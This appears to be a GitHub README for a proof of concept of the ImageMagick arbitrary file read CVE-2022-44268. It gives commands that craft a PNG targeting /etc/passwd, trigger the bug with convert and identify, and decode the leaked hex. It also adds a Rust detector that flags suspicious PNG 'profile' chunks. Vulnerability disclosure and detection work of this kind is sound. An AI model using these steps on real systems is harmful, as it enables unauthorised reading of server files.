A PoC for CVE-2022-44268 - ImageMagick arbitrary file read

Overview

CVE-2022-44268 Arbitrary File Read PoC - PNG generator

This is a proof of concept for the ImageMagick bug described at https://www.metabaseq.com/imagemagick-zero-days/

Tested on ImageMagick v. 7.1.0-48 and 6.9.11-60

How to use

Clone the project

git clone https://github.com/voidz0r/CVE-2022-44268

Run the project

cargo run "/etc/passwd"

Use the file with ImageMagick

convert image.png -resize 50% output.png

Analyze the resized image

identify -verbose output.png

Convert hex to str

python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode())'
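
A check for the input side of the steps above, as an added example that is not part of this project's code: it walks the chunks of an uploaded PNG and reports text chunks keyed `profile` before the file reaches `convert`. It assumes, from the public write-up linked above rather than from this page, that the crafted image names the file to read in such a chunk; `suspicious_profile_chunks` and `sample` are hypothetical names, and zTXt/iTXt are included as a conservative choice.

```rust
// Added example: flag PNG text chunks whose keyword is "profile" (assumed to be
// the CVE-2022-44268 trigger, per the public write-up; not stated on this page).
const PNG_SIG: [u8; 8] = [0x89, b'P', b'N', b'G', 0x0D, 0x0A, 0x1A, 0x0A];

/// Returns (chunk type, bytes after the keyword) for every tEXt/zTXt/iTXt
/// chunk keyed "profile" (case-insensitive); Err if the file is malformed.
pub fn suspicious_profile_chunks(png: &[u8]) -> Result<Vec<(String, String)>, String> {
    if !png.starts_with(&PNG_SIG) { return Err("not a PNG".into()); }
    let (mut hits, mut pos) = (Vec::new(), 8usize);
    while pos < png.len() {
        // Chunk layout: 4-byte big-endian length, 4-byte type, data, 4-byte CRC.
        let header = png.get(pos..pos + 8).ok_or("truncated chunk header")?;
        let len = u32::from_be_bytes([header[0], header[1], header[2], header[3]]) as usize;
        let ctype = &header[4..8];
        let end = pos + 8 + len;
        let data = png.get(pos + 8..end).ok_or("truncated chunk data")?;
        if matches!(ctype, b"tEXt" | b"zTXt" | b"iTXt") {
            // The keyword is everything before the first NUL byte.
            let mut parts = data.splitn(2, |&b| b == 0);
            if parts.next().unwrap_or(&[]).eq_ignore_ascii_case(b"profile") {
                let rest = String::from_utf8_lossy(parts.next().unwrap_or(&[])).into_owned();
                hits.push((String::from_utf8_lossy(ctype).into_owned(), rest));
            }
        }
        if ctype == b"IEND" { break; }
        pos = end + 4; // skip the CRC
    }
    Ok(hits)
}

/// Constructed sample (zeroed CRCs, no image data): signature, one tEXt chunk, IEND.
fn sample(text: &[u8]) -> Vec<u8> {
    let mut v = PNG_SIG.to_vec();
    for (ctype, data) in [(b"tEXt", text), (b"IEND", &b""[..])] {
        v.extend_from_slice(&(data.len() as u32).to_be_bytes());
        v.extend_from_slice(ctype);
        v.extend_from_slice(data);
        v.extend_from_slice(&[0u8; 4]); // placeholder CRC
    }
    v
}

fn main() {
    for s in [sample(b"profile\0/etc/passwd"), sample(b"Comment\0holiday photo")] {
        println!("{:?}", suspicious_profile_chunks(&s));
    }
}
```

An upload handler can reject or strip any file for which the returned list is non-empty, and treat `Err` as a reason to refuse the file.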

Screens

[Screenshots: generating payload; resizing image; hex result]

Owner
Cristian 'void' Giustini
Security Engineer, Security Researcher and Developer. I love to break things and I get mad at the 3rd nested loop.